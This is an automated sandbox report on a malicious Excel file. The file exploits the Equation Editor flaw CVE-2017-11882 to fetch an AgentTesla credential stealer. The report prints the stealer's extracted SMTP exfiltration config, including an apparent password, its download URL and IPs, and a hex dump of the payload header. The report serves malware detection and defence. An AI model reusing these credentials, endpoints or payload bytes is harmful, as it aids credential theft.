Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 99feb78a_by_Libranalysis

Overview

General Information

Sample Name:99feb78a_by_Libranalysis (renamed file extension from none to xlsx)
Analysis ID:412910
MD5:99feb78ab55c66b871d8998b20528b61
SHA1:1c96f08e92401f2396ad0b074ca55049a773e4e0
SHA256:5f4e4fbde7ed003dc34954ee301977f697de1cd2d52beafd898023797ab47255
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2408 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2608 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • joewealth28743.exe (PID: 1980 cmdline: C:\Users\user\AppData\Roaming\joewealth28743.exe MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • Nwefile.exe (PID: 2664 cmdline: 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe' MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
    • Nwefile.exe (PID: 1888 cmdline: {path} MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • Nwefile.exe (PID: 2768 cmdline: 'C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe' MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
    • Nwefile.exe (PID: 2792 cmdline: {path} MD5: 0B4CC13DE8C54ADD5149B56649B3F680)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "sales@orienttech.com.qaOp{^fLb9gN[!mail.orienttech.com.qapdsctsops@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.Nwefile.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.2.Nwefile.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.2.Nwefile.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.2.Nwefile.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    5.2.Nwefile.exe.33d6ac0.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2608, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\joewealth28743.exe, CommandLine: C:\Users\user\AppData\Roaming\joewealth28743.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\joewealth28743.exe, NewProcessName: C:\Users\user\AppData\Roaming\joewealth28743.exe, OriginalFileName: C:\Users\user\AppData\Roaming\joewealth28743.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2608, ProcessCommandLine: C:\Users\user\AppData\Roaming\joewealth28743.exe, ProcessId: 1980

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "sales@orienttech.com.qaOp{^fLb9gN[!mail.orienttech.com.qapdsctsops@gmail.com"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: carbinz.gqVirustotal: Detection: 13%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeReversingLabs: Detection: 48%
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeReversingLabs: Detection: 48%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 99feb78a_by_Libranalysis.xlsxVirustotal: Detection: 39%Perma Link
                      Source: 99feb78a_by_Libranalysis.xlsxReversingLabs: Detection: 43%
                      Machine Learning detection for sampleShow sources
                      Source: 99feb78a_by_Libranalysis.xlsxJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: global trafficDNS query: name: carbinz.gq
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49174 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49175 -> 162.241.85.66:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49176 -> 162.241.85.66:587
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 162.241.85.66:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 13 May 2021 01:22:25 GMTContent-Type: application/x-msdownloadContent-Length: 758272Last-Modified: Wed, 12 May 2021 08:04:19 GMTConnection: keep-aliveETag: "609b8c03-b9200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 35 4c ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 88 0b 00 00 08 00 00 00 00 00 00 da a6 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 a6 0b 00 4f 00 00 00 00 c0 0b 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 6c a6 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 86 0b 00 00 20 00 00 00 88 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 05 00 00 00 c0 0b 00 00 06 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 90 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc a6 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 fc 65 00 00 d8 7e 00 00 03 00 00 00 76 00 00 06 d4 e4 00 00 98 c1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 11 00 00 70 0a 2b 00 06 2a 22 02 28 1f 00 00 0a 00 2a 13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a1 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 04 00 00 06 00 2a 00 13 30 04 00 43 00 00 00 02 00 00 11 00 28 4c 00 00 06 26 12 01 fe 15 0b 00 00 02 12 01 0f 02 28 20 00 00 0a 68 7d c4 00 00 04 12 01 0f 02 28 21 00 00 0a 68 7d c5 00 00 04 07 0a 02 28 22 00 00 0a 20 a2 00 00 00 03 06 28 56 00 00 06 26 2a 3e 00 02 03 28 23 00 00 0a 28 06 00 00 06 00 2a 00 13 30 06 00 32 00 00 00 03 00 00 11 00 02 03 28 24 00 00 0a 00 02 28 25 00 00 0a 16 fe 01 0a 06 2c 1b 02 02 28 22 00 00 0a 16 16 02 28 26 00 00 0a 02 28 27 00 00 0a 28 0d 00 00 06 00 2a 3e 00 02 03 28 23 00 00 0a 28 0b 00
                      Source: Joe Sandbox ViewIP Address: 162.241.85.66 162.241.85.66
                      Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
                      Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
                      Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 162.241.85.66:587
                      Source: global trafficHTTP traffic detected: GET /modex/joewealthx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exeJump to behavior
                      Source: global trafficHTTP traffic detected: GET /modex/joewealthx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: carbinz.gq
                      Source: joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: joewealth28743.exe, 00000004.00000002.2353553201.000000000260C000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352689728.0000000002498000.00000004.00000001.sdmpString found in binary or memory: http://mail.orienttech.com.qa
                      Source: joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: joewealth28743.exe, 00000004.00000002.2357578553.0000000005BE0000.00000002.00000001.sdmp, Nwefile.exe, 00000006.00000002.2240959548.0000000005E30000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpString found in binary or memory: http://yyfqMq.com
                      Source: joewealth28743.exe, 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmpString found in binary or memory: https://YbUuTY812ORW4eX3VhL.com
                      Source: joewealth28743.exe, 00000004.00000002.2352896428.000000000243A000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: joewealth28743.exe, 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, joewealth28743.exe, 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, Nwefile.exe, 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: joewealth28743.exe, 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, Nwefile.exe, 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, Nwefile.exe, 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 4.2.joewealth28743.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.csLarge array initialization: .cctor: array initializer size 11955
                      Source: 6.2.Nwefile.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.csLarge array initialization: .cctor: array initializer size 11955
                      Source: 8.2.Nwefile.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b6D46FB52u002dC9CBu002d4CF2u002dBDD4u002dC0EDA502A803u007d/EA0D635Du002d0B4Cu002d4E47u002dB864u002dA02C362BD2F0.csLarge array initialization: .cctor: array initializer size 11955
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\joewealth28743.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\joewealthx[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00EF6091
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00296889
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029E8F8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00293D08
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_002955A8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00295E22
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029E630
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029425F
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029BEE2
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029EB33
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00290308
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00292B60
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029C3AA
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299F88
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_002977E8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029101A
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029E8E8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299901
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299910
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029CD68
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299DA0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299D92
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_002949F0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029B5F5
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029B5C0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029B638
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299271
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029C6A8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_002986A8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299280
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00298698
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029E328
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299B21
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00299B30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029AF98
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_0029AFC8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 3_2_00540048
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00EF6091
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_003B52B8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_003B62D0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_003B5600
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_003BEEB0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_003B2010
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00C717D0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00C70488
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00C721B8
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DEBEC0
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DE8280
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DE0048
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DE3420
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DEA338
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DEE730
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DEBE10
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeCode function: 4_2_00DEADC0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_008B6091
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D6889
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DE8F8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D3D08
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D55A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D5E28
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DE630
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D425F
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DBEE8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DEB33
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D0308
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D2B60
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DC3B0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9F88
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D77E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D1020
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D5880
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DE8E8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9901
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9910
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DCD68
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9DA0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9D98
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D49F0
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DAA28
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9271
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002DC6A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D86A8
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D7AA5
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeCode function: 5_2_002D9280
